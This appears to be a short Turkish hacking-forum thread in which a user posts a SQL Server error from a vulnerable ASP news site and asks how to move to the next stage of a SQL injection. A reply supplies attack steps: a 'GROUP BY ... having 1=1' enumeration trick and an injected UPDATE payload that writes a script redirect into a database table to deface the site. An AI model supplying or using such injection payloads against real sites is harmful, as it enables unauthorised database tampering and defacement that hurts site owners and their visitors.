Sql İnjeksiyon

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    syklops
    syklops's avatar
    Kayıt Tarihi: 06/Mayıs/2007
    Erkek

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

    [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' ORDER BY NewsID DESC'.

    /asp/lib/database.asp, line 53

    hata böle butun forumlara falan bakıyorum hepsi birbirinin aynı c/p olayı benim yardım almak istedigimm konu ikinci asamay gecemedim bu ''order by newsid desc'' tablo ismi olmuyormu onu ogrenmek istiyorum biraz belescilik oluyor ama ikinci asamaya ansıl gecicem burdan bir suru sey denedim ama olmadı  

  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    wasd
    wasd's avatar
    Kayıt Tarihi: 14/Haziran/2006
    Erkek
    Valla 2. aşamasını bilmem bende birazdan bi soru soracam sql injectionla ilgili ama ORDER BY NewsID DESC komutu NewsIDleri zden aya doğru listeler ;)

    :)
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    fivestar
    fivestar's avatar
    Kayıt Tarihi: 30/Haziran/2007
    Erkek

    evet news.id sonra GROUP BY news.id having 1=1 yapıcan ve +update+services+set+sName='<script>location="http://index(7).html"</script>';--

    bu kodlarla update ediceksin


    Ağırdır sevmelerim her yürek taşıyamaz, büyüktür umutlarım her omuz kaldıramaz
Toplam Hit: 1007 Toplam Mesaj: 3